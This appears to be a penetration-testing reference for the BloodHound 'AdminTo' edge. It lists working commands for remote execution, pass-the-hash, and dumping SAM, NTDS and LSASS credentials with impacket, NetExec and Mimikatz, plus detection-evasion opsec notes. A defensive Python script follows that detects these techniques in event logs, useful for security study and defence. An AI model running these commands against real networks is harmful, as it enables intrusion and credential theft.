AdminTo
Source principal has local administrator privileges on the target computer.
Applies to: User/Group/Computer → Computer
Linux Abuse
NetExec / CrackMapExec → execution
# Command execution
netexec smb <target-computer> -u <username> -p '<password>' -d <domain> -x 'whoami'
# Pass-the-Hash
netexec smb <target-computer> -u <username> -H '<ntlm-hash>' -d <domain> -x 'whoami'
# Check admin access across subnet
netexec smb <target-subnet>/24 -u <username> -p '<password>' -d <domain> --local-auth
impacket → wmiexec (semi-interactive shell)
wmiexec.py '<domain>/<username>:<password>@<target-computer>'
wmiexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
wmiexec.py -k -no-pass '<domain>/<username>@<target-computer>'
impacket → psexec (SYSTEM shell, noisy)
psexec.py '<domain>/<username>:<password>@<target-computer>'
psexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
impacket → smbexec
smbexec.py '<domain>/<username>:<password>@<target-computer>'
smbexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
impacket → atexec (task scheduler)
atexec.py '<domain>/<username>:<password>@<target-computer>' 'whoami'
atexec.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>' 'whoami'
evil-winrm (WinRM, port 5985)
evil-winrm -i <target-computer> -u <username> -p '<password>'
evil-winrm -i <target-computer> -u <username> -H '<ntlm-hash>'
Credential dumping via secretsdump
# Dump SAM + LSA + cached creds
secretsdump.py '<domain>/<username>:<password>@<target-computer>'
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<username>@<target-computer>'
# Dump NTDS.dit remotely (if DC)
secretsdump.py '<domain>/<username>:<password>@<target-computer>' -just-dc-ntlm
LSASS dump via NetExec
netexec smb <target-computer> -u <username> -p '<password>' -d <domain> -M lsassy
netexec smb <target-computer> -u <username> -p '<password>' -d <domain> -M nanodump
Windows Abuse
PsExec (SYSTEM shell)
.\PsExec.exe \\<target-computer> -u <domain>\<username> -p <password> cmd.exe
WMI execution
Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c whoami > C:\out.txt' -ComputerName <target-computer>
PowerShell Remoting
$cred = Get-Credential
Enter-PSSession -ComputerName <target-computer> -Credential $cred
Invoke-Command -ComputerName <target-computer> -Credential $cred -ScriptBlock { whoami }
Mimikatz → credential dump (run on target with admin)
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest
mimikatz # lsadump::sam
RDP
mstsc /v:<target-computer>
# Add user to RDP group if needed:
net localgroup "Remote Desktop Users" <domain>\<username> /add
Scheduled task lateral movement
schtasks /create /s <target-computer> /u <domain>\<username> /p '<password>' /tn "Task" /tr "cmd.exe /c whoami > C:\out.txt" /sc once /st 00:00
schtasks /run /s <target-computer> /tn "Task"
Opsec
- PsExec creates a service (Event ID 4697/7045) → highly detectable
- WMI execution (Event ID 4688 with command line logging) → moderate detection
- WinRM (Event ID 4624 type 3) → lower noise, preferred
- secretsdump triggers multiple SMB/DRSR calls; EDR products commonly flag LSASS access
- Use -exec-method smbexec with wmiexec for fileless execution
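The Opsec notes above name the log events each technique leaves behind. The following is an added example (not part of the BloodHound edge documentation or any tool the page lists) of how a defender turns those three indicators into triage rules: service installs (Security 4697 / System 7045) whose service name is PsExec's PSEXESVC or whose binary is a command shell, 4688 process creations whose parent is the WMI provider host, and one account fanning out logon-type-3 sessions across many hosts in a short window, which is what the subnet-wide admin check from the NetExec section looks like from the log side. The sample events are constructed, and the field names are assumptions that follow the usual Windows Event Log layout.

```python
"""Triage rules for the indicators in the Opsec section. Added example, not
the page's own material; sample events below are constructed."""
from collections import defaultdict
from dataclasses import dataclass
import ntpath

# Constructed sample events (field names assume the usual Windows Event Log
# layout; hosts, users, addresses and times are invented).
SAMPLE_EVENTS = [
    {"EventID": 7045, "Computer": "ws01.corp.local", "ServiceName": "PSEXESVC",
     "ImagePath": "%SystemRoot%\\PSEXESVC.exe", "Time": 100},
    {"EventID": 4697, "Computer": "ws02.corp.local", "ServiceName": "svc_tmp",
     "ImagePath": "%COMSPEC% /Q /c whoami > C:\\out.txt", "Time": 110},
    {"EventID": 7045, "Computer": "ws03.corp.local", "ServiceName": "Spooler",
     "ImagePath": "C:\\Windows\\System32\\spoolsv.exe", "Time": 120},
    {"EventID": 4688, "Computer": "ws01.corp.local",
     "NewProcessName": "C:\\Windows\\System32\\cmd.exe",
     "ParentProcessName": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /c whoami > C:\\out.txt", "Time": 130},
    {"EventID": 4688, "Computer": "ws01.corp.local",
     "NewProcessName": "C:\\Windows\\System32\\notepad.exe",
     "ParentProcessName": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe", "Time": 140},
] + [
    # One account opening network logons on six workstations within seconds.
    {"EventID": 4624, "Computer": f"ws{n:02d}.corp.local", "LogonType": 3,
     "TargetUserName": "jdoe", "IpAddress": "10.0.0.50", "Time": 200 + n}
    for n in range(1, 7)
] + [
    # Interactive logon (type 2): not a network logon, ignored by the fan-out rule.
    {"EventID": 4624, "Computer": "ws01.corp.local", "LogonType": 2,
     "TargetUserName": "asmith", "IpAddress": "-", "Time": 300},
]


@dataclass(frozen=True)
class Alert:
    rule: str
    computer: str
    detail: str


def _basename(path: str) -> str:
    """Lower-cased final path component, Windows separators understood."""
    return ntpath.basename(path).lower()


def service_install_alerts(events):
    """4697/7045: flag PsExec's service name or a service whose binary is cmd."""
    alerts = []
    for ev in events:
        if ev.get("EventID") not in (4697, 7045):
            continue
        name = ev.get("ServiceName", "")
        image = ev.get("ImagePath", "")
        first = image.split(None, 1)[0] if image.strip() else ""
        reasons = []
        if name.upper() == "PSEXESVC":
            reasons.append("PsExec service name")
        if _basename(first) in ("cmd.exe", "%comspec%"):
            reasons.append("service binary is a command shell")
        if reasons:
            alerts.append(Alert("service_install", ev["Computer"],
                                f"{name}: " + "; ".join(reasons)))
    return alerts


def wmi_process_alerts(events):
    """4688 whose parent is WmiPrvSE.exe: a process spawned through WMI."""
    return [Alert("wmi_process_create", ev["Computer"], ev.get("CommandLine", ""))
            for ev in events
            if ev.get("EventID") == 4688
            and _basename(ev.get("ParentProcessName", "")) == "wmiprvse.exe"]


def network_logon_fanout_alerts(events, threshold=5, window=600):
    """4624 logon type 3: one account reaching >= threshold distinct hosts
    within `window` seconds (threshold and window are assumed tuning values)."""
    by_user = defaultdict(list)
    for ev in events:
        if ev.get("EventID") == 4624 and ev.get("LogonType") == 3:
            by_user[ev["TargetUserName"]].append((ev["Time"], ev["Computer"]))
    alerts = []
    for user, logons in by_user.items():
        logons.sort()
        for i, (t0, _) in enumerate(logons):
            hosts = {host for t, host in logons[i:] if t - t0 <= window}
            if len(hosts) >= threshold:
                alerts.append(Alert("admin_fanout", "multiple",
                                    f"{user}: {len(hosts)} hosts within {window}s"))
                break  # one alert per account is enough for triage
    return alerts


def triage(events):
    """Run all three rules and return the combined alert list."""
    return (service_install_alerts(events) + wmi_process_alerts(events)
            + network_logon_fanout_alerts(events))


if __name__ == "__main__":
    for a in triage(SAMPLE_EVENTS):
        print(f"[{a.rule}] {a.computer}: {a.detail}")
```

Running the block prints four alerts for the constructed input: the PSEXESVC install, the shell-backed service, the WMI-spawned cmd.exe, and the six-host fan-out; the ordinary Spooler service and the interactive logon produce nothing. In production the 4688 rule depends on command-line auditing being enabled, which is the condition the Opsec note itself attaches to that event.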